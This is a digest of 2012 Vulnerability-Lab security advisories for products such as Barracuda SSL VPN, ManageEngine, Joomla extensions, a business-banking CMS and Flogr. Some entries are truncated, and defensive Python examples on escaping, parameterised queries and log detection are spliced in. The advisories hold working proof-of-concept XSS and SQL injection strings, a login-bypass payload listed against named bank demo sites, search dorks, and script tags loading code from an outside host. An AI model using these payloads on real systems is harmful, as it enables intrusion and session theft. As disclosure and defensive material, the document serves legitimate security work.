Barracuda Appliances - Validation Filter Bypass Vulnerability

2012-08-01 Thread Vulnerability Lab
Disclaimer:
===
The information provided in this advisory is provided as it is without any
warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social:  twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:   vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, source code, videos and
other information on this website are trademarks of the Vulnerability-Lab team & the
specific authors or managers. To record, list (feed),
modify, use or edit our material contact (ad...@vulnerability-lab.com or
supp...@vulnerability-lab.com) to get permission.

Copyright © 2012 | Vulnerability Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com




Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities

2012-08-01 Thread Vulnerability Lab
Title:
==
Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities


Date:
=
2012-07-16


References:
===
http://vulnerability-lab.com/get_content.php?id=561

Barracuda Networks Security ID: BNSEC-278


VL-ID:
=
561


Common Vulnerability Scoring System:

3


Introduction:
=
The Barracuda SSL VPN is an integrated hardware and software solution enabling 
secure, clientless remote 
access to internal network resources from any Web browser. Designed for remote 
employees and road warriors, 
the Barracuda SSL VPN provides comprehensive control over file systems and 
Web-based applications requiring 
external access. The Barracuda SSL VPN integrates with third-party 
authentication mechanisms to control user 
access levels and provides single sign-on. 

Barracuda SSL VPN   

* Enables access to corporate intranets, file systems or other Web-based 
applications
* Tracks resource access through auditing and reporting facilities
* Scans uploaded files for viruses and malware
* Leverages multi-factor, layered authentication mechanisms, including RSA 
SecurID and VASCO tokens
* Integrates with existing Active Directory and LDAP directories
* Utilizes policies for granular access control framework
* Supports any Web browser on PC or Mac

(Copy of the Vendor Homepage: 
http://www.barracudanetworks.com/ns/products/sslvpn.php)


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web
vulnerabilities in the Barracuda SSL VPN 680 appliance application.


Report-Timeline:

2012-06-09: Researcher Notification & Coordination
2012-06-10: Vendor Notification
2012-07-12: Vendor Response/Feedback
2012-07-14: Vendor Fix/Patch
2012-07-16: Public Disclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: SSL VPN Appliance v680 - 2.2.2.115


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple non-persistent cross site scripting vulnerabilities are detected in the
Barracuda SSL VPN 680 v2.2.2.115 appliance application.
The vulnerabilities allow remote attackers to hijack customer, moderator or admin
sessions; exploitation requires a high degree of user interaction.
The bugs are located in the fileSystem.do, showUserResourceCategories.do and
launchAgent.do files with the bound vulnerable policyLaunching, resourcePrefix,
path & return-To parameters. Successful exploitation can result in account theft,
phishing & client-side content request manipulation.

Vulnerable Module(s):
[+] showUserResourceCategories.do&messageResourcesKey=resourceCategory
[+] fileSystem.do?launchId=l52ca6d&actionTarget=list&path=
[+] launchAgent.do

Vulnerable Parameter(s):
[+] policyLaunching & resourcePrefix
[+] list&path
[+] return-To


Proof of Concept:
=
The client-side cross site scripting vulnerabilities can be exploited by remote
attackers with medium or high required user interaction.
For demonstration or to reproduce ...

1.1
https://sslvpn.[SERVER]/resourceList.do?form=resourceCategoriesForm&readOnly=test&path=%2FshowUserResourceCategories.do&messageResourcesKey=resourceCategory&actionPath=[NON-PERSISTENT SCRIPT CODE!]


1.2
https://sslvpn.[SERVER]/[FILE].do?[VALUE #1]=l52ca6d&[VALUE #2]=[VALUE #3]&[PATH LISTING]=smb/Sales%20Folder/Opt/[NON-PERSISTENT SCRIPT CODE!]

PoC:
https://sslvpn.[SERVER]/fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Testing%20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C


1.3
https://sslvpn.[SERVER]/launchAgent.do?launchId=l3ce418&returnTo=[NON-PERSISTENT SCRIPT CODE!]


Solution:
=
2012-07-14: Vendor Fix/Patch by Barracuda Networks


Risk:
=
The security risk of the non-persistent cross site scripting vulnerabilities
is estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)



ME Application Manager 10 - Multiple Web Vulnerabilities

2012-08-01 Thread Vulnerability Lab
=showdetails&resourcename=DNS+monitor&viewType=showResourceTypes

http://appmanager.127.0.0.1:1338/jsp/ThresholdActionConfiguration.jsp?resourceid=1055&attributeIDs=101&attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&redirectto=/common/serverinfo.do

http://appmanager.127.0.0.1:1338/ProcessTemplates.do?method=createProcessTemplate&templatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C


Risk:
=
1.1
The security risk of the blind SQL injection vulnerabilities is estimated as high.

1.2
The security risk of the non-persistent cross site scripting vulnerabilities
is estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team]  - Ibrahim El-Sayed [storm] 
(st...@vulnerability-lab.com)






Distimo Monitor 6.0 - Multiple Cross Site Vulnerabilities

2012-08-01 Thread Vulnerability Lab
(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)






ME Mobile Application Manager v10 - SQL Vulnerabilities

2012-08-01 Thread Vulnerability Lab
Title:
==
ME Mobile Application Manager v10 - SQL Vulnerabilities


Date:
=
2012-07-04


References:
===
http://www.vulnerability-lab.com/get_content.php?id=628


VL-ID:
=
628


Common Vulnerability Scoring System:

8.1


Introduction:
=
ManageEngine Mobile Applications Manager is a server and application 
performance monitoring software that helps businesses 
ensure high availability and performance for their business applications by 
ensuring servers and applications have 
high uptime. The application performance management capability includes server 
monitoring, application server 
monitoring, database monitoring, web services monitoring, virtualization 
monitoring, cloud monitoring and an array of 
other application management capability that will help IT administrators manage 
their resources effectively.

Note: The mobile version 10 is compatible with BlackBerry, iPhone & Android
smartphones with the IE, Safari or Firefox browser.

(Copy of the Vendor Homepage: 
http://www.manageengine.com/products/applications_manager )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple SQL injection
vulnerabilities in ManageEngine's Mobile Application Manager v10.


Report-Timeline:

2012-06-23: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
ManageEngine
Product: Mobile Application Manager v10.0


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

Multiple SQL injection vulnerabilities are detected in ManageEngine's Mobile
Application Manager v10.
The vulnerabilities allow a remote attacker or a local low-privileged user
account to inject and execute their own SQL commands
on the affected application's DBMS without user interaction. The vulnerabilities
are located in the DetailsView.do and Search.do
modules and the bound vulnerable parameters showMGDetails&groupId & viewName.
Successful exploitation of the vulnerabilities
results in DBMS & application compromise via SQL injection.

Vulnerable Module(s):
[+] DetailsView.do
[+] Search.do

Vulnerable Parameter(s):
[+] showMGDetailsgroupId
[+] viewName


Proof of Concept:
=
The SQL injection vulnerabilities in the mobile manager application can be
exploited by remote attackers without user interaction.
For demonstration or to reproduce ...

PoC:
http://appmanager.127.0.0.1:1339/mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+WHERE+table_schema=database()--%20-

http://appmanager.127.0.0.1:1339/mobile/Search.do?method=mobileSearch&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search


Risk:
=
The security risk of the SQL injection vulnerabilities is estimated as high.


Credits:

Vulnerability Laboratory [Research Team]  - Ibrahim El-Sayed [storm] 
(st...@vulnerability-lab.com)



Kaspersky PM 5.0.0.164 - Software Filter Vulnerability

2012-08-01 Thread Vulnerability Lab
<RoleValues>
  <RoleValue ID="118" RoleType="37"/>
  <RoleValue ID="119" RoleType="38"/>
  <RoleValue ID="120" RoleType="39"/>
  <RoleValue ID="121" RoleType="40"/>
  <RoleValue ID="122" RoleType="41"/>
  <RoleValue ID="123" RoleType="42"/>
  <RoleValue ID="124" RoleType="43"/>
  <RoleValue ID="125" RoleType="44"/>
  <RoleValue ID="126" RoleType="45"/>
  <RoleValue ID="127" RoleType="46"/>
</RoleValues>
  </CreditCard>
</CreditCards>
<BankAccounts>
  <BankAccount Name="[PERSISTENT INJECTED SCRIPT CODE]" ID="128" ParentID="62"/>
  <BankAccount Name="" ID="129" ParentID="62">
<RoleValues>
  <RoleValue ID="130" RoleType="47"/>
  <RoleValue ID="131" RoleType="48"/>
  <RoleValue ID="132" RoleType="49"/>
  <RoleValue ID="133" RoleType="50"/>
  <RoleValue ID="134" RoleType="51"/>
  <RoleValue ID="135" RoleType="52"/>
  <RoleValue ID="136" RoleType="53"/>
  <RoleValue ID="137" RoleType="54"/>
  <RoleValue ID="138" RoleType="55"/>
  <RoleValue ID="139" RoleType="56"/>
</RoleValues>
  </BankAccount>
</BankAccounts>
  </Identity>
</Identities>
  </Database>
</root>



Solution:
=
XML special characters in item names need to be encoded when the export is
processed into an HTML file.
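Added example (not Kaspersky's code or the advisory's own): it mirrors the export nesting shown above with a constructed sample, shows why an item name that is correctly entity-encoded in the XML re-emerges as live markup once the parsed value is concatenated into the HTML export, and applies the encoding the solution calls for. The sample values and the function names are assumptions.

```python
import html
import xml.etree.ElementTree as ET

# Constructed sample export mirroring the nesting shown in the advisory
# (Database > Identities > Identity > BankAccounts > BankAccount[Name]).
# The first Name holds a benign marker standing in for injected markup; in
# the XML it is entity-encoded, exactly as a correct XML writer stores it.
SAMPLE_EXPORT = """<root>
  <Database>
    <Identities>
      <Identity Name="Default" ID="62">
        <BankAccounts>
          <BankAccount Name="&quot;&gt;&lt;b&gt;INJECTED&lt;/b&gt;" ID="128" ParentID="62"/>
          <BankAccount Name="Savings" ID="129" ParentID="62">
            <RoleValues>
              <RoleValue ID="130" RoleType="47"/>
            </RoleValues>
          </BankAccount>
        </BankAccounts>
      </Identity>
    </Identities>
  </Database>
</root>
"""


def bank_account_names(xml_text: str) -> list[str]:
    """Return the Name attribute of every BankAccount in document order.

    The XML parser decodes &lt;/&gt;/&quot; back to the raw characters, so
    the markup is present in memory even though the file itself was safe.
    """
    root = ET.fromstring(xml_text)
    return [acct.get("Name", "") for acct in root.iter("BankAccount")]


def render_vulnerable(xml_text: str) -> str:
    """The flawed export pattern: decoded item names are concatenated into
    the HTML report unencoded, so the marker becomes live markup."""
    rows = "".join(f"<li>{name}</li>" for name in bank_account_names(xml_text))
    return f"<ul>{rows}</ul>"


def render_fixed(xml_text: str) -> str:
    """The fix the advisory calls for: encode <, >, & and quotes in each item
    name before writing it into the HTML export."""
    rows = "".join(
        f"<li>{html.escape(name, quote=True)}</li>"
        for name in bank_account_names(xml_text)
    )
    return f"<ul>{rows}</ul>"


def contains_live_markup(rendered: str, marker: str = "<b>INJECTED</b>") -> bool:
    """True if the attacker-controlled tag survived as a real HTML element."""
    return marker in rendered


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(SAMPLE_EXPORT))
    print("fixed:     ", render_fixed(SAMPLE_EXPORT))
```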


Risk:
=
The security risk of the persistent software vulnerability is estimated as 
low(+)/(-)medium.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)






Kaspersky Password Manager 5.0.0.164 - Software Filter Vulnerability

2012-08-02 Thread Vulnerability Lab




Joomla com_package - SQL Injection Vulnerability

2012-08-06 Thread Vulnerability Lab
Title:
==
Joomla com_package - SQL Injection Vulnerability


Date:
=
2012-07-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=652


VL-ID:
=
652


Common Vulnerability Scoring System:

8.3


Introduction:
=
Joomla is a free and open source content management system (CMS) for publishing 
content on the World
Wide Web and intranets and a model–view–controller (MVC) Web application 
framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and 
software design
patterns, stores data in a MySQL database, and includes features such as page 
caching,
RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and 
support for language
internationalization.
Joomla had been downloaded 23 million times. Between March 2007 and February 
2011 there had been
more than 21 million downloads. As of November 2011, there are over 8,600 free 
and commercial
extensions available from the official Joomla! Extension Directory and more 
available from other sources.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla)


Abstract:
=
A Vulnerability-Lab researcher discovered a SQL injection vulnerability in the
com_package module of the Joomla CMS.


Report-Timeline:

2012-07-08: Public or Non-Public Disclosure



Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A SQL injection vulnerability is detected in the com_package module of the
Joomla Content Management System.
Remote attackers & low-privileged user accounts can inject and execute their own SQL
commands to compromise the application's DBMS.
The vulnerability is located in the com_package module with the bound
vulnerable id parameter. Successful exploitation
of the vulnerability results in DBMS (server) or application (web) compromise.

Vulnerable Module(s):
[+] index.php?option=com_package

Vulnerable Parameter(s):
[+] id


Proof of Concept:
=
The SQL injection vulnerability can be exploited by remote attackers without a
privileged user account or
required user interaction. For demonstration or to reproduce ...

PoC:

Path:   /
File:   index.php
Module: ?option=com_package
Parameter:  details&id=-1'[SQL Injection]--
URL:
http://www.xxx.com/index.php?option=com_package&task=details&id=174-1'[SQL Injection]--


Risk:
=
The security risk of the remote SQL Injection vulnerability is estimated as 
critical.


Credits:

Vulnerability Research Laboratory -  Chokri Ben Achor 
(meis...@vulnerability-lab.com)



iAuto Mobile Application 2012 - Multiple Web Vulnerabilities

2012-08-06 Thread Vulnerability Lab
%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3C&State[equal]=11&action=search


Browse by Make and Model / AC Cobra / 

PoC:
http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20
width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/


Comments & Reply to The Comment & Topic & Text (commentSid)

PoC:
http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448&commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C&returnBackUri=%2Flisting%2Fcomments%2F448%2F%3F
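Added example (not from the advisories or the affected vendors): a small access-log check that classifies requests shaped like the proofs of concept in this digest, the percent-encoded `"><iframe ... onload=` probe in a path or query parameter (Barracuda SSL VPN, ManageEngine Application Manager, iAuto) and the mixed-case `UnION SelEct ... information_schema` probe (ManageEngine Mobile Application Manager), so a defender can find such attempts in web server logs. The log lines, IPs and hostnames are constructed; the function and rule names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (combined log format). Requests 1 and 2 are
# modelled on this digest's PoC URLs for the Barracuda SSL VPN and ManageEngine
# advisories; request 3 is an ordinary Joomla page view. IPs are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2012:10:00:01 +0000] "GET /fileSystem.do?launchId=l52ca6d&actionTarget=list&path=smb/Sales%20Folder/Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C HTTP/1.1" 200 5120
10.0.0.7 - - [01/Aug/2012:10:00:02 +0000] "GET /mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+SelEct+group_concat(table_NAME),2,3+from+information_schema.tables+WHERE+table_schema=database()--%20- HTTP/1.1" 200 7331
10.0.0.9 - - [01/Aug/2012:10:00:03 +0000] "GET /index.php?option=com_package&task=details&id=174 HTTP/1.1" 200 2048
"""

# Request line of the combined log format: client IP, timestamp, method, target.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Coarse signatures, applied to the *decoded* target. They are deliberately
# narrow: a tag opener for commonly abused elements or an inline event handler
# for XSS; UNION SELECT, information_schema or a trailing SQL comment for SQLi.
XSS_RE = re.compile(r"<\s*(?:iframe|script|img|svg|object|embed)\b|\bon[a-z]+\s*=", re.I)
SQLI_RE = re.compile(
    r"\bunion\b\s+(?:all\s+)?\bselect\b|\binformation_schema\b|--\s*-?\s*$", re.I
)


def normalise(target: str) -> str:
    """Percent-decode (bounded, so nested encoding cannot hide the probe) and
    turn '+' into a space, so encoded and plain forms compare equal."""
    current = target
    for _ in range(3):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def classify(target: str) -> list[str]:
    """Return the signature families that match one request target."""
    decoded = normalise(target)
    findings = []
    if XSS_RE.search(decoded):
        findings.append("xss")
    if SQLI_RE.search(decoded):
        findings.append("sqli")
    return findings


def scan_log(text: str) -> list[dict]:
    """Parse each log line and report the requests that match a signature."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        findings = classify(m.group("target"))
        if findings:
            hits.append({
                "ip": m.group("ip"),
                "path": m.group("target").split("?", 1)[0],
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The rules are intentionally simple; in production they belong in a WAF or SIEM rule set with tuning against the application's legitimate parameter names.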



Risk:
=
1.1
The security risk of the persistent input validation vulnerability is estimated
as medium(+).

1.2
The security risk of the non-persistent cross site scripting vulnerabilities
is estimated as low(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)






Inout Mobile Webmail APP - Multiple Web Vulnerabilities

2012-08-06 Thread Vulnerability Lab
Title:
==
Inout Mobile Webmail APP  - Multiple Web Vulnerabilities


Date:
=
2012-06-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=609


VL-ID:
=
609


Common Vulnerability Scoring System:

3.5


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in the  inoutscripts mobile Inoutmail Webmail CMS 2012.


Report-Timeline:

2012-06-08: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities were detected in the 
inoutscripts mobile Inoutmail CMS 2012. The bugs allow remote attackers to 
inject malicious script code on the application side (persistent). Successful 
exploitation can lead to session hijacking (manager/admin) or stable 
(persistent) context manipulation. Exploitation requires low user interaction 
& a privileged user account. The persistent validation vulnerabilities are 
located in the new mail & contacts modules, in the bound To, Cc and Bcc 
values. The attacker sends a mail whose To or Bcc values carry script code; 
when the admin or customer opens the arriving mail, the stored script code in 
the To or Bcc fields executes in the viewer's session while checking mail. A 
low-privileged user account can also use the bug to store the payload 
persistently for exploitation against higher-privileged accounts.

Vulnerable Module(s):
[+] New Mail
[+] Contacts

Vulnerable Parameter(s):
[+] To
[+] Cc
[+] Bcc


Proof of Concept:
=
The persistent vulnerabilities can be exploited by remote attackers with low 
required user interaction. For demonstration or reproduction ...

Insert the demonstration string into the Bcc, Cc & To fields of the send new 
mail form. A second possibility is to send a mail from outside to the inout 
webmail with the string as the To/Cc/Bcc value.

PoC:
<iframe src=http://vuln-lab.com onload=alert("VL")>
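Added example, not part of the original advisory and not Inoutmail's code: the Python below (standard library only) parses the To/Cc/Bcc headers of a constructed inbound message whose display name carries the iframe payload above, then contrasts a renderer that concatenates the parsed values into the inbox markup (the failure mode the advisory describes) with one that HTML-encodes them at output time. The message, addresses and list markup are constructed for the example; the payload uses single quotes so it stays inside one RFC 5322 quoted-string, which is an assumption about how an attacker would format it.

```python
import html
from email import message_from_string
from email.utils import getaddresses

# Constructed sample (not real traffic): the To: display name carries the
# advisory's payload.  An outsider controls these headers simply by sending
# mail, which is the advisory's second delivery route.
PAYLOAD = "<iframe src=http://vuln-lab.com onload=alert('VL')>"
RAW_MAIL = (
    "From: attacker@example.net\n"
    f'To: "{PAYLOAD}" <victim@example.org>\n'
    'Cc: "Alice Example" <alice@example.org>\n'
    "Subject: hello\n"
    "\n"
    "body\n"
)


def recipients(raw_message):
    """Parse To/Cc/Bcc with the stdlib parser; returns (display_name, address) pairs.
    The parser happily returns markup as a display name: parsing is not validation."""
    msg = message_from_string(raw_message)
    values = []
    for header in ("To", "Cc", "Bcc"):
        values.extend(msg.get_all(header, []))
    return getaddresses(values)


def render_inbox_vulnerable(raw_message):
    """What the advisory describes: header-derived strings dropped into the inbox
    markup untouched, so a display name that is markup becomes live markup."""
    return "".join(f"<li>{name} ({addr})</li>" for name, addr in recipients(raw_message))


def render_inbox_fixed(raw_message):
    """Encode every header-derived value for the HTML context at output time.
    quote=True also covers templates that place the value inside an attribute."""
    return "".join(
        f"<li>{html.escape(name, quote=True)} ({html.escape(addr, quote=True)})</li>"
        for name, addr in recipients(raw_message)
    )


if __name__ == "__main__":
    print(recipients(RAW_MAIL))
    print(render_inbox_vulnerable(RAW_MAIL))
    print(render_inbox_fixed(RAW_MAIL))
```

Encoding belongs at the point of output, not at receive time: the same header value may later be written into an attribute, a JavaScript string or a mailto: link, and each context needs its own encoding.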


Risk:
=
The security risk of the persistent input validation vulnerabilities is 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - snup (s...@vulnerability-lab.com) 
[http://snup1.blogspot.com]




BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability

2012-08-06 Thread Vulnerability Lab
Title:
==
BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability


Date:
=
2012-07-09


References:
===
http://www.vulnerability-lab.com/get_content.php?id=654


VL-ID:
=
654


Common Vulnerability Scoring System:

8.5


Abstract:
=
A Vulnerability-Lab researcher discovered an SQL injection vulnerability in the 
Beneficial Bank Business Banking v4.13.1 CMS.


Report-Timeline:

2012-07-09: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

An auth bypass vulnerability was detected in the Beneficial Bank Business 
Banking 4.13.1 Content Management System. Remote attackers without a 
privileged user account can inject their own SQL commands through the login 
form and compromise the application DBMS. The vulnerability is located in the 
login module, in the bound vulnerable Company ID & Company Password 
parameters. Successful exploitation results in DBMS (server) or application 
(web) compromise & unauthorized web application (admin/customer) panel access.

Vulnerable Section(s):
[+] Login

Vulnerable Parameter(s):
[+] User & Pass


Proof of Concept:
=
The login auth bypass vulnerability can be exploited by remote attackers 
without a privileged user account. For demonstration or reproduction ...

PoC:
user : ' or 1=1--
pass : ' or 1=1--

URL: 
http://www.thebeneficial-ebanking.com/customer_demo/index2.html
https://www.frontrangebankonline.com/customer_demo/index2.html
http://www.libertybaybank.com/customer_demo/index2.html
http://www.fs-bankonline.com/customer_demo/index2.html
http://www.centralstateonline.com/customer_demo/index2.html
http://www.hvbonlinebanking.com/customer_demo/index2.html
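Added example, not the bank's code: a minimal Python/sqlite3 login check showing why the PoC value ' or 1=1-- in both fields authenticates against a string-built query and why the same value fails against a parameterised one. The table, column names and the demo account are constructed for this example.

```python
import sqlite3

BYPASS = "' or 1=1--"   # the advisory's PoC value for both login fields


def make_demo_db():
    """Constructed in-memory table standing in for the login backend (not the real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE companies (company_id TEXT, company_password TEXT, role TEXT)")
    db.execute("INSERT INTO companies VALUES ('acme', 'S3cret!', 'customer')")
    db.commit()
    return db


def login_vulnerable(db, company_id, password):
    """Query assembled by string formatting.  With ' or 1=1-- in both fields it becomes
      ... WHERE company_id = '' or 1=1--' AND company_password = '' or 1=1--'
    The first quote closes the literal, OR 1=1 is always true and -- comments out
    the password check, so the first row comes back and the login succeeds."""
    sql = ("SELECT company_id, role FROM companies "
           f"WHERE company_id = '{company_id}' AND company_password = '{password}'")
    return db.execute(sql).fetchone()


def login_fixed(db, company_id, password):
    """Parameterised query: the driver binds the values as data, so quotes and
    comment markers in the input never reach the SQL parser as syntax."""
    sql = ("SELECT company_id, role FROM companies "
           "WHERE company_id = ? AND company_password = ?")
    return db.execute(sql, (company_id, password)).fetchone()


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable:", login_vulnerable(db, BYPASS, BYPASS))   # row for 'acme'
    print("fixed:     ", login_fixed(db, BYPASS, BYPASS))        # None
```

The demo compares a clear-text password purely to keep the query shape identical to the PoC; a real login looks the user up by id alone and verifies a salted password hash in application code, which also removes the password from the SQL entirely.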


Risk:
=
The security risk of the auth bypass vulnerability is estimated as critical.


Credits:

Vulnerability Research Laboratory -  Chokri Ben Achor 
(meis...@vulnerability-lab.com)




Flogr v2.5.6 & v2.3 - Cross Site Script Vulnerabilities

2012-08-09 Thread Vulnerability Lab
Title:
==
Flogr v2.5.6 & v2.3 - Cross Site Script Vulnerabilities


Date:
=
2012-07-11


References:
===
http://www.vulnerability-lab.com/get_content.php?id=656


VL-ID:
=
656


Common Vulnerability Scoring System:

2


Introduction:
=
Flogr is a flexible script that displays your flickr photos in a customizable 
photo gallery you host on your website. 
If you use flickr but want to have a different look and feel for your photo 
gallery you may like flogr.

Customizable photoblog interface for your flickr photos
Display all flickr photos, only photos with certain tags or only certain 
photosets
Displays photo details, EXIF data, tags, geo location, and photo comments
Thumbnail viewer displays photos by date taken, photoset, and tag
Embedded Slimbox photo slideshow
Map view of your geo tagged photos
Flickr tag cloud page
RSS 2.0 support 

(Copy of the Vendor Homepage:  https://code.google.com/p/flogr/ )


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered 
multiple non-persistent cross site scripting vulnerabilities in the Flogr 
v2.5.6 & v2.3 photo gallery CMS.


Report-Timeline:

2012-07-11: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple non-persistent cross site scripting vulnerabilities were detected in 
the Flogr v2.5.6 & v2.3 photo gallery CMS. The vulnerabilities allow remote 
attackers to hijack website customer, moderator or admin sessions; they 
require high user interaction or a local low-privileged user account. The 
vulnerabilities are located in recent.php & index.php, in the bound vulnerable 
tag parameter. Successful exploitation can result in account theft, phishing 
& client-side content request manipulation.


Vulnerable Module(s):
[+] Recent Listing
[+] Index Listing

Vulnerable File(s):
[+] Recent.php
[+] Index.php

Vulnerable Parameter(s):
[+] Tag


Proof of Concept:
=
Dork(s): 
inurl:tag= powered by flogr v2.3
inurl:tag= powered by flogr v2.5.6
inurl:tag= powered by flogr v1.7 

PoC:
http://[TARGET]/recent.php?tag=[CROSS SITE SCRIPTING]
http://[TARGET]/index.php?tag=[CROSS SITE SCRIPTING]

Reference(s):
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E
xxx.com/bigpictureproject/index.php?tag=<script src%3d//xxx.com/s></script>
xxx.com/flogr/recent.php?tag=<script src%3d//xxx.com/s></script>
xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E
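Added example, not Flogr's code: the first reference string above URL-decodes to "><script src=//xxx.com/s></script>, and the leading "> indicates the tag value is reflected inside a quoted attribute (an assumption drawn from the payload's shape, not something the advisory states). The Python below extracts the parameter the way a server-side $_GET['tag'] would see it, shows the attribute breakout against a template that reflects it raw, the same template with html.escape(quote=True), and a small oracle for judging a captured response body. The host name and input markup are constructed.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The advisory's first reference with a placeholder host (constructed URL).
POC_URL = ("http://target.example/recent.php"
           "?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E")


def tag_param(url):
    """Decode ?tag= the way the server side sees it (percent-decoding included)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("tag", [""])[0]


def render_vulnerable(tag):
    """Reflects the raw value into a quoted attribute.  The payload's leading ">
    closes value="..." and the <input> element; the remainder is parsed as markup."""
    return f'<input type="text" name="tag" value="{tag}">'


def render_fixed(tag):
    """Attribute context: html.escape(quote=True) encodes & < > " and ' so the
    value cannot terminate the attribute or open a tag."""
    return f'<input type="text" name="tag" value="{html.escape(tag, quote=True)}">'


def reflects_unescaped(body, probe):
    """Oracle for a captured response: True when the probe appears byte-for-byte,
    i.e. no encoding was applied.  Use a probe that contains " < and >."""
    return probe in body


if __name__ == "__main__":
    tag = tag_param(POC_URL)
    print(repr(tag))
    print(render_vulnerable(tag), reflects_unescaped(render_vulnerable(tag), tag))
    print(render_fixed(tag), reflects_unescaped(render_fixed(tag), tag))
```

The same value reflected into a text node, a JavaScript string or a URL would need the encoding for that context; the attribute case is shown because that is what the reference payload targets.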


Risk:
=
The security risk of the client-side cross site scripting vulnerabilities is 
estimated as low(+)|(-)medium.


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242



Joomla com_fireboard - SQL Injection Vulnerability

2012-08-09 Thread Vulnerability Lab
Title:
==
Joomla com_fireboard - SQL Injection Vulnerability


Date:
=
2012-07-11


References:
===
